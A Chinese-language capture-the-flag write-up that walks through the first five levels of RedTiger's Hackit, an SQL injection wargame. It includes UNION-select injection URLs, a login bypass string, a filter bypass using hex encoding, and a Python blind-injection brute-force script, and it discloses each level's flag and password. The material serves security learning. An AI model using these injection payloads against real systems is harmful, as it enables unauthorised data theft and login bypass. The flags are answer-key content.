writeup--RedTiger's Hackit
来源:互联网 发布:阿里云服务器代理商 编辑:程序博客网 时间:2024/06/05 07:28
RedTiger’s Hackit
第一关
首先点进Category 1
网址后面跟了?cat=1,很明显是一个sql注入
看了下还给了表名。。Tablename: level1_users
构造了下
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
得到密码thatwaseasy
flag是27cbddc803ecde822d87a7e8639f9315
第二关
看见有登录框,应该也是sql注入
用万能用户密码’or ”=’试了下,成功注入
flag是1222e2d4ad5da677efb188550528bfaa
第三关
看到提示Get an error。。。弄了半天弄不出error,看了下别人的wp,改成?usr[1]=1得到error信息,
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25
然后看了下urlcrypt.inc,有下面的代码,看来cow和admin后面的一大串都是加密过的,既然给了加密和解密的函数,直接写sql注入然后加密再传过去就可以了,话说它的加密方式还更新过。。这个如果要用的话要在linux下面加密,在windows下可能会乱码
<?php // warning! ugly code ahead :) function encrypt($str) { $cryptedstr = ""; srand(3284724); for ($i =0; $i < strlen($str); $i++) { $temp = ord(substr($str,$i,1)) ^ rand(0, 255); while(strlen($temp)<3) { $temp = "0".$temp; } $cryptedstr .= $temp. ""; } return base64_encode($cryptedstr); } function decrypt ($str) { srand(3284724); if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str)) { $str = base64_decode($str); if ($str != "" && $str != null && $str != false) { $decStr = ""; for ($i=0; $i < strlen($str); $i+=3) { $array[$i/3] = substr($str,$i,3); } foreach($array as $s) { $a = $s ^ rand(0, 255); $decStr .= chr($a); } return $decStr; } return false; } return false; }?>
构造的明文为’ union select 1,password,2,3,4,5,6 from level3_users where username=’Admin
加密后得到
https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw
拿到flag:a707b245a60d570d25a0449c2a516eca
第四关
点了下click me,发现多了?id=1 很明显是可以注入,看了下主页的标题是盲注。。
先猜keyword有多长
http://redtiger.labs.overthewire.org/level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21)
发现长度为21,那写个python脚本来爆破一下
from urllib.request import *import stringfrom re import *char=string.printableurl="http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,{0},1)='{1}')"login ={'Cookie':'level4login=there_is_no_bug'}answer=""for q in range(1,22): for i in char: test=(url .format(q,i)) request=Request(test,None,headers=login) a=urlopen(request) s=a.read().decode() if(findall("Query returned 1 rows.",s)): print("{0} ".format(q)+i) answer+=i breakprint(answer)
得到keyword为 killstickswithbr1cks!
flag: e8bcb79c389f5e295bac81fda9fd7cfa
第五关
看到描述watch the login errors
然后输admin进去试下,然后输入框消失了,看来是过滤了admin
然后发现它也无视大小写,那直接用十六进制来绕过吧
根据提示密码要md5加密
构造出
’ union select 0x61646d696e as username, md5(123) as password #
flag为ca5c3c4f0bc85af1392aef35fc1d09b3
未完待续
- writeup--RedTiger's Hackit
- RedTiger's Hackit Level 1
- RedTiger's Hackit Level 2
- RedTiger's Hackit Level 3
- 渗透测试演练平台RedTigers Hackit通关writeup以及wechall平台介绍
- writeup-bby-s-first-elf
- Writeup of BlueDon CTF's MISC-1:杂项全家桶
- Writeup of NJUPT CTF platform's some easy Reverse
- [RE]lab1B&lab1A's writeup&脚本;使堆栈平衡的另一种方法
- ACTF writeup
- ACTF writeup
- ISCC2014 writeup
- hctf2014 writeup
- UCTF WriteUp
- ISCC2014 writeup
- ISCC2016Basic Writeup
- writeup-flag
- writeup-passcode
- 浅析回调
- typedef 和#define 的区别
- 03 建立单独的KVM虚拟化
- 欢迎使用CSDN-markdown编辑器
- 思维晚操-12.19
- writeup--RedTiger's Hackit
- MyBatis学习之环境搭建
- MyEclipse下创建的项目 导入eclipse
- ios 约束(二)
- Linear Algebra - Lesson 27. 复数矩阵和快速傅里叶变换
- JavaEE Spring框架学习笔记(理论学习之通过@Bean注解)
- 如何查看socket options
- 欢迎使用CSDN-markdown编辑器
- 超漂亮的Bootstrap 富文本编辑器summernote